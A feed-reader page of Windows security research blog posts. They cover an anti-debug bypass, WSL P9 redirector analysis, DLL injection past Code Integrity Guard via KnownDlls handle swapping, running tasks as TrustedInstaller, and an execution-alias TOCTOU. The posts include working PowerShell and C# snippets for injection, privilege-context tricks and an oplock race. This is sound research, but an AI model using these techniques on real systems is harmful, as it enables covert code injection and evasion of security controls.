Reading view

There are new articles available, click to refresh the page.

ProcessDebugObjectHandle Anti-Anti-Debug Trick

During my implementation of NT Debug Object support in NtObjectManager (see a related blog here) I added support to open the debug object for a process by using the ProcessDebugObjectHandle process information class. This immediately struck me as something which could be used for anti-debugging, so I did a few searches and sure enough I was right, it's already documented (for example this link).

With that out of the way I went back to doing whatever it was I should have really been doing. Well not really, instead I considered how you could bypass this anti-debug check. This information was harder to find, and typically you just hook NtQueryInformationProcess and change the return values. I wanted to do something more sneaky, so I looked at various examples to see how the check is done. In pretty much all cases the implementation is:

BOOL IsProcessBeingDebugged() { HANDLE hDebugObject; NTSTATUS status = NtQueryInformationProcess(GetCurrentProcess(), ProcessDebugObjectHandle, hDebugObject, sizeof(hDebugObject), NULL); if (NT_SUCCESS(status) && hDebugObject) { return TRUE; } return FALSE;}

The code checks if the query is successful and then whether a valid debug object handle has been returned, returning TRUE if that's the case. This would indicate the process is being debugged. If the an error occurs or the debug object handle is NULL, then it indicates the process is not being debugged.

To progress I'd now analyse the logic and find the failure conditions for the detection, fortunately the code isn't very big. We want the function to return FALSE even though the debugger is attached, this means we need to either:

  • Make the query return an error code even though a debugger is attached, or...
  • Let the query succeed but return a NULL handle.
We've reached the limit with what we can do staring at the anti-debug code. We'll dig into the other side, the kernel implementation of the information class. It boils down to a single function:

NTSTATUS DbgkOpenProcessDebugPort(PEPROCESS Process, PHANDLE DebugObject) { if (!Process->DebugPort) return STATUS_PORT_NOT_SET; if (PsTestProtectedProcessIncompatibility(Process, KeGetCurrentProcess())) { return STATUS_PROCESS_IS_PROTECTED; } return ObOpenObjectByPointer(Process->DebugObject, MAXIMUM_ALLOWED, DbgkDebugObjectType, UserMode, DebugObject); 
} 


There are three failure cases in this code:

  1. If there's no debug port attached then return STATUS_PORT_NOT_SET.
  2. If the process holding the debug port is at a higher protection level return STATUS_PROCESS_IS_PROTECTED.
  3. Finally open a handle to the debug object and return the status code from the open operation.
For our purposes case 1 is a non-starter as it means the process is not being debugged. Case 2 is interesting but as the Process object parameter (which comes from the handle passed in the query) will be the same as KeGetCurrentProcess that'd never fail. We're therefore all in on case 3. It turns out that the debug objects, like many kernel objects are securable resources. We can confirm that by using NtObjectManager by querying for the DebugObject type and checking its SecurityRequired flag.

PowerShell executing "Get-NtType DebugObject | Select SecurityRequired" and returning True.

If SecurityRequired is true then it means the object must have a security descriptor whether it has a name or not. Therefore we can cause the call to ObOpenObjectByPointer to fail by setting a security descriptor which prevents the process using the anti-debug check opening the debug object and therefore returning FALSE from the check.

To test that we need a debugger and a debuggee. As I do my best to avoid writing new C++ code I converted the anti-debug code to C# using my NtApiDotNet library:


using (var result = NtProcess.Current.OpenDebugObject(false)) { if (result.IsSuccess) { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("[ERROR] We're being Debugged, stahp!"); } else { Console.ForegroundColor = ConsoleColor.Green; Console.WriteLine("[SUCCESS] Go ahead, we're cool!"); }}

I don't bother to check for a NULL handle as the kernel code indicates that can't happen, either you get an error, or you get a valid handle. Anyway it doesn't need to be robust, ..., for me ;-)

For the debugger, again we can write it in C#:

Win32ProcessConfig config = new Win32ProcessConfig();config.ApplicationName = @"Path\To\Debuggee.exe";config.CommandLine = "debuggee";config.CreationFlags = CreateProcessFlags.DebugProcess; using (var p = Win32Process.CreateProcess(config)){ using (var dbg = p.Process.OpenDebugObject()) { SecurityDescriptor sd = new SecurityDescriptor(""); dbg.SetSecurityDescriptor(sd, SecurityInformation.Dacl); while (true) { var e = dbg.WaitForDebugEvent(); e.Continue(); if (e is ExitProcessDebugEvent) { break; } } }}

This code is pretty simple, we create the debuggee process with the DebugProcess flag. When CreateProcess is called the APIs will create a new debug object and attach it to the new process. We can then open the debug object and set an appropriate security descriptor to block the open call in the debuggee. Finally we can just poll the debug object which resumes the target, looping until completion.

What can we set as the security descriptor? The obvious choice would be to set an empty DACL which blocks all access. This is distinct from a NULL DACL which allows anyone access. We can specify an empty DACL in SDDL format using "D:". If you test with an empty DACL the debuggee can still open the debug object, this is because the kernel specified MAXIMUM_ALLOWED, as the current user is the owner of the object this allows for READ_CONTROL and WRITE_DAC access to be granted. If we're an administrator we can change the owner field (or by using a WontFix bug) however instead we'll just specify the OWNER_RIGHTS SID with no access. This will block all access to the owner. The SDDL for that is "D:(A;;0;;;OW)".

If you put this all together yourself you'll find it works as expected. We've successfully circumvented the anti-debug check. Of course this anti-debug technique is unlikely to be used in isolation, so it's not likely to be of much real use.


The anti-debug author is trying to model one state variable, whether a process is being debugged, by observing the state of something else, the success or failure from opening the debug object port. You might assume that as the anti-debug check is directly interacting with a debug artefact then there's a direct connection between the two states. However as I've shown that's not the case as there's multiple ways the failure case can manifest. The code could be corrected to check explicitly for STATUS_PORT_NOT_SET and only then indicate the process is not being debugged. Of course this behavior is not documented anywhere, and even it was could be subject to change.

The problem with the anti-debug code is not that you can set a security descriptor on the debug object and get it to fail but the code itself does take into accurately take into account the thing its trying to check. This problem demonstrates the fundamental difficulty in writing secure code, specifically:

Any non-trivial program has a state space too large to accurately model in finite time which leads to unexpected or undefined behavior.

Or put another way:

The time constrained programmer writes what works in testing, not what is correct.

While bypassing anti-debug is hardly a major security issue (well unless you write DRM code), the process I followed here is pretty much the same for any of my bugs. I thought it'd be interesting to see my approach to these sorts of problems.

Digging into the WSL P9 File System

Windows 10 version 1903 is upon us, which gives me a good reason to go looking at what new features have been added I can find bugs in. As it's clear people seem to appreciate fluff rather than in-depth technical analysis I thought I'd provide a overview of my process I undertook to look at one new feature, the P9 file system added for the Windows Subsystem for Linux (WSL). The aim is to show my approach to analyzing a feature with the minimum amount of reverse engineering, ideally with no disassembly.

Background

When WSL was first introduced it had a pretty poor story for interoperability between the Linux instance and the host Windows environment. In the early versions the only, officially supported, way to interop was through DrvFS which allows you to mount local Windows drives into the Linux environment. This story has changed over time such as adding support to start Windows executables from Linux and better NTFS case-sensitivity support (which I blogged about already).

But one fairly large pain point remained, accessing Linux files from Windows applications. You could do it, the files are stored inside the distro's package directory (%LOCALAPPDATA%\Packages\DISTRO\LocalState\rootfs), so you could open them directly. However WSL relies on various tricks to deal with the mismatch between Windows and Unix-style filesystem semantics, such as storing the UID/GID and file permission bits in extended attributes. Modifying these files using an unenlightened Windows application could result in corruption of the file state which in the worse case could break the distro.

With the release of 1903 the WSL team (if such a thing exists) looks to be trying to solve this problem once and for all. This blog introduced the new feature, accessing Linux files via a UNC path. I felt this warranted at least a small amount of investigation to see how it works and whether there's any quick wins or low-hanging fruit.

Understanding the Feature

The first thing I needed was to setup a x64 version of 1903 in a Hyper-V VM. I then made the following changes, which I would always do regardless of what I end up using the VM for:
  • Disabled SecureBoot for the VM.
  • Enabled kernel debugging through BCDEDIT. Note that I tend to be paranoid enough to disable NICs in the VM (and my success of setting up alternative debug transports is mixed) so I resort to serial debugging over a named pipe. Note that for Gen 2 Hyper-V VMs you can't add a serial port from the UI, instead you need use the Set-VMComPort PowerShell cmdlet.
  • Install my tooling, such as NtObjectManager and SysInternals suite, especially Process Monitor.
  • Enabled the Windows Subsystem for Linux feature.
  • Install a distro of choice from the Windows Store. Debian is the most lightweight, but any will do for our purposes. Note that you don't need to login to the Store to get the distro, though the app will do its best to convince you otherwise. Don't listen to its lies.
With a VM in hand we can now start the investigation. The first thing I do is take any official information at face value and use that to narrow the scope. For example reading the official blog post I could determine the following:
  • The feature uses the Plan 9 Filesystem Protocol to access files.
  • The files are accessed via the UNC path \\WSL$\DISTRO but only when the distro is running.
  • The P9 server is hosted in the init process when the distro starts.
  • The P9 server uses UNIX sockets for communication.
Based on those observations the first thing I want to do is try and find how the UNC path is implemented. The rationale for starting at the UNC path is simple, that's the only externally observable feature described in the blog post. Everything else, such as the use of P9 or UNIX sockets could be incorrect. I'm not expecting the blog post to outright lie about the implementation, but there's sometimes more important details to get right than others. It's worth noting here that you should increase your skepticism of a feature's technical description the older the blog post is as things can and will change.

If we can find how the UNC path is implemented that should also lead us to whether P9 is used as well as what transport the feature is using. An important question is whether these files are really accessed via the UNC path, which would imply kernel support, or is it only in Explorer? This is important to allow us to track down where the implementation lies. For example it's possible that if the feature only works in Explorer it could be implemented as a shell extension, similar to how MTP/PTP is supported.

To determine whether its a kernel driver or a shell extension it's as simple as opening the UNC path using the lowest possible function, which in this case means calling a system call. Invoking a system call will also eliminate the chance the WSL UNC path is implemented using some new feature added to the Win32 APIs. As my NtObjectManager module directly calls the NtOpenFile system call we can use that to do the test. I ran the following PowerShell command to check on the result:

$f = Get-NtFile \??\UNC\wsl$\Debian\bin\bash

This command successfully opens the BASH executable file. This is a clear indication that we now need to look at the kernel to find the driver responsible for implementing the UNC path. This is commonly implemented by writing a Network Mini-Redirector which handles a lot of the setup with the Multiple UNC Provider (MUP) and the IO Manager.

At this point the assumption would be the mini-redirector would be implemented in the LXCORE system driver which implements the rest of WSL. However a quick check of the imports with the DUMPBIN tool, shows the driver doesn't import anything from RDBSS which would be crucial for the implementation of a mini-redirector. 

To find the actual driver name I'll go for the simplest, brute force approach, just list all drivers which import RDBSS and see if any are obvious candidates based on name. You could achieve this in one of many ways, for example you could implement a PE file parser and check the imports, you could script DUMPBIN, or you could just GREP (well FINDSTR) for RSBSS, which is what I'll do. I ran the following:

c:\> findstr /I /M rdbss c:\windows\system32\drivers\*.sys
c:\windows\system32\drivers\csc.sys
c:\windows\system32\drivers\mrxdav.sys
c:\windows\system32\drivers\mrxsmb.sys
c:\windows\system32\drivers\mrxsmb20.sys
c:\windows\system32\drivers\p9rdr.sys
c:\windows\system32\drivers\rdbss.sys
c:\windows\system32\drivers\rdpdr.sys

In the FINDSTR command I just list all drivers which contain the case insensitive string RDBSS and print out the filename only (unless you enjoy terminal beeps). The result of this process is a clear candidate P9RDR. This also likely confirms the use of the P9 protocol, though of course we should never jump the gun on this. 

We could throw the driver into a disassembler at this point and start RE, but I don't want to go there just yet. Instead, in the spirit of laziness I'll throw the driver into STRINGS and get out all printable debug string information, of which there's likely to be some. I typically use the SysInternals STRINGS rather than the BINUTILS one, just as I usually always have it installed on any test system and it handles Unicode and ANSI strings with no additional argument. Below is some of the output from the tool:

c:\> strings c:\Windows\system32\drivers\p9rdr.sys
...
\Device\P9Rdr
P9: Invalid buffer for P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid share name in P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid AF_UNIX path in P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid share name in P9RDR_REMOVE_CONNECTION_TARGET_INPUT.
...
\wsl$

We can see a few things here, firstly we can see the WSL$ prefix, this is a good indication that we're in the right place. Second we can see a device name which gives us a good indication that there's expected to be communication from user-mode to kernel mode to configure the device. And finally we can see the string "AF_UNIX" which ties in nicely with our expectation that Unix Sockets are being used.

One this which is missing from the STRINGS output is any indication of the Unix socket file name being used. Unix sockets can be used in an "abstract" fashion, however typically you access the socket through a file path on disk. It's most likely that a file is how the driver and communicates with the socket (I don't even know if Windows supports the "abstract" socket names). Therefore if it is indeed using a file it's not a fixed filename. The kernel has support for a socket library so again maybe this would be the place we could go disassembling, but instead we'll just do some dynamic analysis using PROCMON.

In order to open a socket from a file there must be some attempt to call the IO Manager to open it, this in turn would likely be detectable using PROCMON's filter driver. We can therefore make the following assumptions:

  • The file open can be detected in PROCMON.
  • The socket file will be opened in the context of the first process to open the UNC path.
  • The open request will have the P9RDR driver on the call stack.
The first assumption is a general problem with PROCMON. There are ways of opening files, such as inside another filter driver which cannot be detected by PROCMON as it never receives the request. However we'll assume that is can be detected, of course if we don't find it we might have to resort to disassembly or kernel debugging after all. 

The second assumption is based on the fact the WSL distribution isn't always running, therefore any Unix socket file would only be opened on demand, and for reasons of laziness is likely to be in the same process that first makes the request. It could push the request to a background thread, but it seems unlikely. By making this assumption we can filter PROCMON to only show open file requests from a known process.

The final assumption is there to filter down all possible open file requests to the ones we care about. As the driver is a mini-redirector the call chain is likely to be IO Manager to MUP to RDBSS to P9RDR to UNIX SOCKET. Therefore we only care about anything which goes through the driver of interest. This assumption is more important if assumption 2 is false as it might mean that we couldn't filter to a specific process, but we'll go with it anyway on the basis that it's useful technique to learn.

Based on the assumptions we can set PROCMON's filters for a specific process (we'll use PowerShell again) and filter for all CreateFile operations. The Windows kernel doesn't specifically differentiate between open and create calls (open is a specific case of create) so PROCMON doesn't either.

PROCMON Filter View showing filtering on powershell process name and CreateFile operation.

What about the call stack? As far as I can tell you can't filter on the call stack directly, instead we'll do something else. But first gather a trace of a PowerShell session where you execute the Get-NtFile command show earlier in this blog post. Now we want to save the trace as an XML file. Why an XML file? First, the XML format is easy to access, unlike the native PML format. However, the real answer is shown in the following screenshot.

PROCMON Save Dialog showing options for XML output including stack traces.

The screenshot shows the options for exporting to XML. It allows us to save the call stacks for all trace events. It will even resolve symbols, however as we're only interested in the module on the stack not the name we can select to include the stack trace, but not symbol resolving. With an exported trace we can now filter the calls based using a simple XPath expression. The following is a simple PowerShell script to run the XPath query.

$xml = [xml]$(Get-Content "LogFile.XML")
$xml.SelectNodes("//event[stack/frame[contains(path, 'p9rdr')]]/Path[text()]")

The script is pretty simple, if you "cast" a text file to an XML object (using [xml]) PowerShell will create an XML DOM Document from the text. With the Document object we can now call SelectNodes with an appropriate XPath. In this case we just want to select all Path of all events which have a stack trace frame containing the P9RDR module. Running this script against the capture results in one hit:

%LOCALAPPDATA%\Packages\DISTRO\LocalState\fsserver

DISTRO is the name of the Store package you installed the distro from, for example Debian is installed into TheDebianProject.DebianGNULinux_76v4gfsz19hv4. With a file name of fsserver it seems pretty clear what the file is for, but just to check lets open the event back in PROCMON and look at the call stack.

PROCMON call stack opening fsserver showing AFUNIX driver and P9RDR.

I've highlighted areas of interest, at the top there's the calls through the AFUNIX driver, which demonstrates that the file is being opened due a UNIX socket connection being made. At the bottom we can see a list of calls in the P9RDR driver. As symbol resolving is enabled we can use the symbol information to target specific areas of the driver for reverse engineering. Also now we know the path we can put this back into PROCMON as a filter and from that we can confirm that it's the init process which is responsible for setting up the file server.

In conclusion we can at least confirm a few things which we didn't know before.
  • The handling of the UNC paths is handled entirely in kernel mode via a mini-redirector. This makes the file system more interesting from a security perspective as it's parsing arbitrary user data in the kernel.
  • The file system uses UNIX sockets for communication, this is handled by the kernel driver and the main init process.
  • The socket protocol is presumably P9 based on the driver name, however we've not actually confirmed that to be true.
There's of course still things we'd want to know:
  • How is the UNC mappings configured? Via the device driver?
  • Is the protocol actually P9, if so what information is being passed across?
  • How well "fuzzed" are the protocol parsers.
  • Does this file system have any other interesting behaviors.
Some of those things will have to wait for another blog post.









Windows Code Injection: Bypassing CIG Through KnownDlls

TL;DR; This blog post describes a technique to inject a DLL into a process using only Duplicate Handle process access (caveats apply) which will also bypass Code Integrity Guard.

I've been attending Blackhat USA 2019 and watched a presentation by Amit Klein and Itzik Kotler on Windows Process Injection techniques. While I didn't learn anything new from the presentation that you couldn't from just reading Hexacorn's blog it was interesting to see them document what techniques worked against Code Integrity Guard (CIG) and what did not. CIG if you don't know, is Microsoft's term for blocking non-MS signed DLLs from being loaded into a process. If CIG is enabled on a process then you can load an arbitrary DLL not signed by Microsoft, instead you'll have to do some sort of shellcode or ROP.

During the presentation I was waiting for the punchline of a technique which bypasses CIG to load an arbitrary DLL, but it never arrived. I'm guessing the researchers don't bother to read my blog posts *sigh*, such as this one on injecting code into a Protected Processes though abusing the KnownDll mechanism. This would also work to bypass CIG if injecting from an external process not under CIG (or Device Guard). All the ways of hijacking the Known DLL loader that I've documented rely on knowing the location of Known DLL handle in NTDLL's data section. That's useful when you have little control over the target process and only an arbitrary read/write primitive. For user-mode code injection you're likely to be able to do anything to the process.

Writing a new handle value does have draw backs if you're thinking about it from a generic code injection perspective. Firstly the location of the handle can (and does) change depending on the version of NTDLL and secondly if you access and write memory of another process you might as well call your binary malware.exe. Of course writing to memory is not the only way to hijack Known DLLs, you can achieve the same thing with only Duplicate Handle access on the process, which is probably slightly less suspicious.

How can we do this without modifying the handle value? There's 3 key observations we can make that only require Duplicate Handle access:
  1. We can find the existing handle value of the KnownDlls directory by duplicating handles from a process to another and querying for the name.
  2. We can close a handle in another process by specifying DUPLICATE_CLOSE_SOURCE to DuplicateHandle.
  3. The kernel's handle allocator will reuse the handle values so we can replace the original handle with a different object through brute force.
Let's go through how this works in practice. I'm going to show some snippets of PowerShell which use my NtObjectManager module. I'm not going to provide a full end-to-end proof-of-concept however for various reasons.

Step 1: Bring up a process to inject into, the Known DLLs handle is created during the initial loader process before the process entry point is called, so the process must run at least that long. Once we know the Process ID of the process to inject into we can dump all handles in the process and look for anything with the NT type of Directory. Each directory handle can then be duplicated into the current process and inspected. If the name of the directory is "\KnownDlls" we've found our target. In PowerShell we can use my Get-NtHandle cmdlet to dump the handle table, this doesn't require opening the process itself. To get the name we only need PROCESS_DUP_HANDLE access to the target. Here's a basic PS function to get the handle value:

$id = $(Get-Process notepad).Id
$hs = Get-NtHandle -ProcessId $id -ObjectTypes Directory
foreach($h in $hs) {
  if ($h.Name -eq '\KnownDlls') {
    $handle = $h.Handle
    break
  }
}

Step 2: Create an empty object directory and insert into it a named image section object. The name of the section needs to match the name of the system32 DLL we want to hijack. The file backing the section is obviously the DLL you want loaded into the process. Again some code, assuming you've already created the directory 

$dir = New-NtDirectory
$sect = Use-NtObject($f = Get-NtFile -Path "\??\c:\dir\fake.dll") {
        New-NtSection -File $f -SectionAttributes Image `
          -Root $dir -Path "blah.dll" -Protection Execute
    }
}

Step 3: Close the original Known DLLs handle. Again this only needs Duplicate Handle access. At this point you probably also want to suspend the process to ensure something doesn't execute and allocate the handle over the top of your now closed handle. Of course if you suspend the process you'll need a bit more access.

$proc = Get-NtProcess -ProcessId $id -Access DupHandle
Copy-NtObject -SourceHandle $handle -SourceProcess $proc `
                                    -CloseSource

Step 4: Repeatedly duplicate the fake Known DLLs directory you created in step 2 until you get the same handle value as you identified in step 1. If the process is suspended this shouldn't take more than a few tries at worst.

$i = 0
while($i -lt 1000) {
   $h = Copy-NtObject -DestinationProcess $proc -Object $dir
   if ($h -eq $Handle) {
       break
   }
   $i++
}

Step 5: Everything is now setup. The final step is you'll need to get a new library loaded from system32 inside the process. There's a number of possible techniques for this. You could go old-skool and create a new thread in process calling LoadLibrary. Or you could identify a DLL which you know the process will load in response to a UI or RPC action. For example opening a file in Notepad will spawn the explorer open dialog which pulls in ALOT of new DLLs. Be creative, at least if you don't want to open the process with anything above Duplicate Handle access.


The question you might be asking is, "Do any AV/Host Detection tools catch this trick?". Honestly I don't know, nor do I care. However it has some things going for it:

  • It doesn't requiring reading or writing memory from the target process.
  • Inline hooks on LoadLibrary/LdrLoadDll will just see loading a system32 DLL unless they also then query for the mapped file name after the operation has completed.
  • It bypasses CIG, so anyone thinking that'll prevent injection will be surprised.
You could probably make it even more convert, but I'm not going to do so. As I've noted before I'm also not going to write a proof-of-concept or write a tool to do this, you can do it yourself.












The Art of Becoming TrustedInstaller - Task Scheduler Edition

2 years ago I wrote a post running a process in the TrustedInstaller group. It was pretty well received, and as others pointed out there's many way of doing the same thing. However in my travels I came across a new way I've not seen documented before, though I'm sure someone will point out where I've missed documentation. As with the previous post, this does require admin privileges, it's not a privilege escalation. Also I tested the behavior I'm documented on Windows 10 1903. Your mileage may vary on different versions of Windows.

It revolves around the Task Scheduler (obvious by the title I guess), specifically calling the IRegisteredTask::RunEx method exposed by the Task Scheduler COM API. The prototype of RunEx is as follows:

HRESULT RunEx(
  VARIANT      params,
  LONG         flags,
  LONG         sessionID,
  BSTR         user,
  IRunningTask **ppRunningTask
);

The thing we're going to use is the user parameter, which is documented as "The user for which the task runs." Cheers Microsoft! Through a bit of trial and error, and some reverse engineering it's clear the user parameter can take three types of string values:

  1. A normal user account. This can be the name or a SID. The user must be logged on at the time of starting the task as far as I can tell.
  2. The standard system accounts, i.e. SYSTEM, LocalService or NetworkService.
  3. A service account!
Number 3 is the one we're interested in here, it allows you to specify an installed service account, such as TrustedInstaller and the task will run as SYSTEM with the service SID included. Let's try it out.

The advantage of using the user parameter is the task can be registered to run as a normal user, and we'll change it at run time to be more sneaky. In theory you could directly register the task to run as TrustedInstaller, but then it'd be more obvious if anyone went looking. First we need to create a scheduled task, run the following script in PowerShell to create a simple task which will run notepad.

$a = New-ScheduledTaskAction -Execute notepad.exe
Register-ScheduledTask -TaskName 'TestTask' -Action $a

Now we need to call RunEx. While PowerShell has a Start-ScheduledTask cmdlet neither it, or the schtasks.exe /Run command allows you to specify the user parameter (aside, the /U parameter for schtask does not do what you might think). Instead as the COM API is scriptable we can just run some PowerShell again and use the COM API directly.

$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()

$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
$task = $folder.GetTask('TestTask')
$task.RunEx($null, 0, 0, $user)

After executing this script you should find a copy of notepad running as SYSTEM with with the TrustedInstaller group in the access token.


Enjoy responsibly. 

Overview of Windows Execution Aliases

I thought I'd blogged about this topic, however it turns out I hadn't. This blog is in response to a recent Twitter thread from Bruce Dawson on a "fake" copy of Python which Microsoft seems to have force installed on some peoples Windows 10 1903 installations. I'll go through the main observation in the thread that the Python executable is 0 bytes in size, how this works under the hood to start a process and I'll finish with a dumb TOCTOU bug which still exists in part of the implementation which _might_ be useful as part of an EOP chain.

Execution Aliases for UWP applications were introduced in Windows 10 Fall Creators Update (1709/RS3). For application developers this feature is exposed by adding an AppExecutionAlias XML element to the application's manifest. The manifest information is used by the AppX installer to drop the alias into the %LOCALAPPDATA%\Microsoft\WindowsApps folder, which is also conveniently (or not depending on your POV) added to the user PATH environment variable. This allows you to start a UWP application as if it was a command line application, including passing command line arguments. One example is shown below, which is taken from the WinDbgX manifest.

<uap3:Extension Category="windows.appExecutionAlias" Executable="DbgX.Shell.exe" EntryPoint="Windows.FullTrustApplication"> <uap3:AppExecutionAlias> <desktop:ExecutionAlias Alias="WinDbgX.exe" />
</uap3:AppExecutionAlias></uap3:Extension>

This specifies an execution alias to run DbgX.Shell.exe from the file WinDbgX.exe. If we go to the WindowsApps folder we can see that there is a file with that name, and as mentioned in the Twitter thread it is a 0 byte file. Also if you try and open the file (say using the type command) it fails.

Directory listing of WindowsApps folder showing 0 byte WinDbgX.exe file and showing that trying to open file fails.

How can an empty file result in a process being created? Executing the WinDbgX.exe file inside a shell while running Process Monitor shows some interesting results which I've highlighted below:

Process Monitor output showing opens to WinDbgX with a "REPARSE" result and also a call to get the reparse point data.

The first thing to highlight is the CreateFile calls which return a "REPARSE" result. This is a good indication that the file contains a reparse point. You might assume therefore that this file is a symbolic link to the real target, however a symbolic link would still be possible to open which we can't do. Another explanation is the reparse point is a custom type, not understood by the kernel. This ties in with the subsequent call to FileSystemControl with the FSCTL_GET_REPARSE_POINT code which would indicate some user-mode code is requesting information about the stored reparse point. Looking at the stack trace we can see who's requesting the reparse point data:

Stack trace of FSCTL_GET_REPARSE_POINT showing calls from CreateProcessInternal

The stack trace shows the reparse point data is being queried from inside CreateProcess, through the exported function LoadAppExecutionAliasInfoEx. We can dig into CreateProcessInternal to see how it all works:

HANDLE token = ...;NTSTATUS status = NtCreateUserProcess(ApplicationName, ..., token); if (status == STATUS_IO_REPARSE_TAG_NOT_HANDLED) { LPWSTR alias_path = ResolveAlias(ApplicationName); PEXEC_ALIAS_DATA alias; LoadAppExecutionAliasInfoEx(alias_path, &alias); status = NtCreateUserProcess(alias.ApplicationName, ..., alias.Token);}

CreateProcessInternal will first try and execute the path directly, however as the file has an unknown reparse point the kernel fails to open the file with STATUS_IO_REPARSE_TAG_NOT_HANDLED. This status code provides a indicator to take an alternative route, the alias information is loaded from the file's reparse tag using LoadAppExecutionAliasInfoEx and an updated application path and access token are used to start new the new process.

What is the format of the reparse point data? We can easily dump the bytes and have a look in a hex editor:

Hex dump of reparse data with highlighted tag.

The first 4 bytes is the reparse tag, in this case it's 0x8000001B which is documented in the Windows SDK as IO_REPARSE_TAG_APPEXECLINK. Unfortunately there doesn't seem to be a corresponding structure, but with a bit of reverse engineering we can work out the format is as follows:

Version: <4 byte integer>
Package ID: <NUL Terminated Unicode String>
Entry Point: <NUL Terminated Unicode String>
Executable: <NUL Terminated Unicode String>
Application Type: <NUL Terminated Unicode String>

The reason we have no structure is probably because it's a serialized format. The Version field seems to be currently set to 3, I'm not sure if there exists other versions used in earlier Windows 10 but I've not seen any. The Package ID and Entry Point is information used to identify the package, an execution alias can't be used like a shortcut for a normal application it can only resolve to an installed packaged application on the system. The Executable is the real file to executed that'll be used instead of the original 0 byte alias file. Finally Application Type is the type of application being created, while a string it's actually an integer formatted as a string. The integer seems to be zero for desktop bridge applications and non-zero for normal sandboxed UWP applications. I implemented a parser for the reparse data inside NtApiDotNet, you can view it in NtObjectManager using the Get-ExecutionAlias cmdlet.

Result of executing Get-ExecutionAlias WinDbgX.exe

We now know how the Executable file is specified for the new process creation but what about the access token I alluded to? I actually mentioned about this at Zer0Con 2018 when I talked about Desktop Bridge. The AppInfo service (of UAC fame) has an additional RPC service which creates an access token from a execution alias file. This is all handled inside LoadAppExecutionAliasInfoEx but operates similar to the following diagram:

Operation of RAiGetPackageActivationToken.

The RAiGetPackageActivationToken RPC function takes a path to the execution alias and a template token (which is typically the current process token, or the explicit token if CreateProcessAsUser was called). The AppInfo service reads the reparse information from the execution alias and constructs an activation token based on that information. This token is then returned to the caller where it's used to construct the new process. It's worth noting that if the Application Type is non-zero this process doesn't actually create the AppContainer token and spawn the UWP application. This is because activation of a UWP application is considerably more complex to stuff into CreateProcess, so instead the execution alias' executable file is specified as the SystemUWPLauncher.exe file in system32 which completes activation based on the package information from the token.

What information does the activation token contain? It's basically the Security Attribute information for the package, this can't normally be modified from a user application, it requires TCB privilege. Therefore Microsoft do the token setup in a system service. An example token for the WinDbgX alias is shown below:

Token security attributes showing WinDbg package identity.

The rest of the activation process is not really that important. If you want to know more about the process checkout my talks on Desktop Bridge and the Windows Runtime.

I promised to finish up with a TOCTOU attack. In theory we should be able to create execution alias for any installed application package, it might not start a working process be we can use RAiGetPackageActivationToken to get a new token with explicit package security attributes which could be useful for further exploitation. For example we could try creating one for the Calculator package with the following PowerShell script (note this uses version information for calculator on 1903 x64).

Set-ExecutionAlias -Path C:\winapps\calc.exe `
     -PackageName "Microsoft.WindowsCalculator_8wekyb3d8bbwe" `
     -EntryPoint "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App" `
     -Target "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.53.0_x64__8wekyb3d8bbwe\Calculator.exe" `
     -AppType UWP1

If we call RAiGetPackageActivationToken this works and creates a new token, however it creates a reduced privilege UWP token (it's not an AppContainer but for example all privileges are stripped and the security attributes assumes it'll be in a sandbox). What if we wanted to create a Desktop Bridge token which isn't restricted in this way? We could change the AppType to Desktop, however if you do this you'll find RAiGetPackageActivationToken fails with an access denied error. Digging a bit deeper we find it fails in daxexec!PrepareDesktopAppXActivation, specifically when it's checking if the package contains any Centennial (now Desktop Bridge) applications.

HRESULT PrepareDesktopAppXActivation(PACTIVATION_INFO activation_info) { if ((activation_info->Flags & 1) == 0) { CreatePackageInformation(activation_info, &package_info); if (FAILED(package_info->ContainsCentennialApplications())) { return E_ACCESS_DENIED; // <-- Fails here. } } // ... }

This of course makes perfect sense, no point creating an desktop activation token for a package which doesn't have desktop applications. However, notice the if statement, if bit 1 is not set it does the check, however if set these checks are skipped entirely. Where does that bit get set? We need to go back to caller of PrepareDesktopAppXActivation, which is, unsurprisingly, RAiGetPackageActivationToken.

ACTIVATION_INFO activation_info = {};bool trust_label_present = false;HRESULT hr = IsTrustLabelPresentOnReparsePoint(path, &trust_label_present);if (SUCCEEDED(hr) && trust_label_present) { activation_info.Flags |= 1;} PrepareDesktopAppXActivation(&activation_info);

This code shows that the flag is set based on the result of IsTrustLabelPresentOnReparsePoint. While we could infer what that function is doing let's reverse that as well:

HRESULT IsTrustLabelPresentOnReparsePoint(LPWSTR path,
bool *trust_label_present) { HANDLE file = CreateFile(path, READ_CONTROL, ...); if (file == INVALID_HANDLE_VALUE) return E_FAIL; PSID trust_sid; GetWindowsPplTrustLabelSid(&trust_sid); PSID sacl_trust_sid; GetSecurityInfo(file, SE_FILE_OBJECT, PROCESS_TRUST_LABEL_SECURITY_INFORMATION, &sacl_trust_sid); *trust_label_present = EqualSid(trust_sid, sacl_trust_sid); return S_OK;}

Basically what this code is doing is querying the file object for its Process Trust Label. The label can only be set by a Protected Process, which normally we're not. There are ways of injecting into such processes but without that we can't set the trust label. Without the trust label the service will do the additional checks which stop us creating an arbitrary desktop activation token for the Calculator package.

However notice how the check re-opens the file. This is occurring after the reparse point has been read which contains all the package details. It should be clear that here is a TOCTOU, if you can get the service to first read a execution alias with the package information, then switch that file to another which has a valid trust label we can disable the additional checks. This was an attack that my BaitAndSwitch tool was made for. If you build a copy then run the following command you can then use RAiGetPackageActivationToken with the path c:\x\x.exe and it'll bypass the checks:

BaitAndSwitch c:\x\x.exe c:\path\to\no_label_alias.exe c:\path\to\valid_label_alias.exe x

Note that the final 'x' is not a typo, this ensures the oplock is opened in exclusive mode which ensures it'll trigger when the file is initially opened to read the package information. Is there much you can really do with this? Probably not, but I thought it was interesting none the less. It'd be more interesting if this had disabled other, more important checks but it seems to only allow you to create a desktop activation token.

That about wraps it up for now. Embedding this functionality inside CreateProcess was clever, certainly over the crappy support for UAC which requires calling ShellExecute. However it also adds new and complex functionality to CreateProcess which didn't exist before, I'm sure there's probably some exploitable security bug in the code here, but I'm too lazy to find it :-)

Bypassing Low Type Filter in .NET Remoting

